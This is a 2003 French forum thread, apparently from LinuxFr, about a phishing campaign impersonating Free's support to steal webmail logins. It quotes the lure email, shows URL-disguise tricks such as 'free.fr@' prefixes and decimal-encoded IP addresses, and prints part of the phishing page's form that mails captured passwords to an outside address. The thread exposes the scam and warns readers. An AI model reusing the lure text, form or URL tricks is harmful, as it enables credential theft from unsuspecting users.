Un petit plaisantin se faisant passer pour supportfree@free.fr arrose quelques boites e-mail de free avec un message du genre :
Bonjour,
Suite à un changement d'ordre matériel, nous vous invitons à confirmer une nouvelle fois votre compte afin de réadapter notre réseau à vos besoins. Si vous possèdez plusieurs comptes, nous vous demandons de bien vouloir les actualiser tous, sauf si vous souhaitez en résilier.
Nous vous demandons de répondre le plus rapidement possible à ce message sous peine de suppression de votre espace web.
Veuillez suivre la démarche ci-dessous :
Lisez le formulaire
Remplissez les champs d'informations suivants
Cliquez sur "envoyer"
S'ensuit un beau formulaire avec login/password
Evidemment ça pue l'arnaque à plein nez, et c'en est une... le gars a même poussé le vice jusqu'à se créer une page perso chez free avec un beau script php pour récupérer tout ce que les gens vont renseigner ...
Journal [Free] Usurpation d'identité et escroquerie
28
oct.
2003
# Re: [Free] Usurpation d'identité et escroquerie
Posté par Pascal Terjan (site web personnel) . Évalué à 2.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Bruno (site web personnel) . Évalué à 4.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Bruno (site web personnel) . Évalué à 3.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Pascal Terjan (site web personnel) . Évalué à 3.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Bruno (site web personnel) . Évalué à 1.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Pierre Tramo . Évalué à 2.
Porter plainte, par contre, ça permet d'enclencher un processus permettant de tracer et perquisitionner chez le petit malin. Donc, on peut espérer qu'il arrête de nuire, on doit pouvoir également en perquisitionnant se donner une idée des dégâts occasionnés, etc.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Julien CARTIGNY (site web personnel) . Évalué à 3.
En général, il y a un moyen simple pour détecter le problème, c'est l'adresse donnée qui est du type:
http://free.fr@mon_serveur_pirate/(...)
free.fr n'étant pas l'adresse mais juste le login de connexion sur la page racine de mon_serveur_pirate
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Nap . Évalué à 3.
http://free.fr@3558547933/(...) ça le fait bien :)
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Annah C. Hue (site web personnel) . Évalué à 3.
Tant mieux.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Nap . Évalué à 2.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Boa Treize (site web personnel) . Évalué à 1.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Nap . Évalué à 1.
sinon c'est vrai que je me suis toujours demandé à quoi ça servait :)
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par JMVF . Évalué à 0.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par LLG . Évalué à 1.
http://3639551844/(...) correcte
http://3625396068/(...) quork!
Un ping sur les deux donne la même adresse IP, mais le quork ne passe pas!
Le quork a été fabriqué avec cette erreur:
(((216*255)+239)*256+39)*256+100
3625396068
(((216*256)+239)*256+39)*256+100
3639551844
# Re: [Free] Usurpation d'identité et escroquerie
Posté par Pierre Tramonson . Évalué à 1.
# Re: [Free] Usurpation d'identité et escroquerie
Posté par j (site web personnel) . Évalué à 2.
http://iiimp.free.fr(...)
extrait du code source d'un des cadres :
form name="Ident" action="http://www.alibaweb.net/cgi-bin/services/form2email.pl(...)" method="post"
p>
<input type="hidden" value="neo.anderson4@laposte.net" name="recipient"
<input type="hidden" value="http://imp.free.fr/login.php3(...)" name="redirect"
<input type="hidden" value="Un_Nouveau_MdP_Free!!!" name="subject"
<input type="hidden" value="Le_Gentil_Site_Ki_Donne_Les_MdP_Free!!!" name="from"
<input type="hidden" value="Le_Gentil_Site_Ki_Donne_Les_MdP_Free!!!" name="email"
<input type="hidden" value="REMOTE_HOST,REMOTE_ADDR,REMOTE_IDENT,R
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par j (site web personnel) . Évalué à 1.
ce problème a été signalé par ACBM il y a plus d'un mois déja :
http://www.acbm.com/inedits/actua.html(...) (voir leur dépêche du 16 septembre)
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par furai (site web personnel) . Évalué à 1.
-> les pages sont suffixees en .php et plus en php3.
Il y a la meme sur http://iimp.free.fr(...)
D'ailleurs, c'est normale qu'il traine des scripts qui permettent d'envoyer des mails comme ca ?
(dans ce cas http://www.alibaweb.net/cgi-bin/services/form2email-fake.pl,(...) mais j'en ai deja vu d'autre)
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Anonyme . Évalué à 1.
Après tout, il n'ya rien de répréhensible à vouloir toutes les 10 secondes utiliser imp, il n'est précisé nulle part que cela envoie un courriel quelque part, et une requete toutes les 10 secondes ne risque pas de charger un serveur...
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Pierre Tramonson . Évalué à 2.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par GCN (site web personnel) . Évalué à 1.
[^] # Re: [Free] Usurpation d'identité et escroquerie
Posté par Annah C. Hue (site web personnel) . Évalué à 2.
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.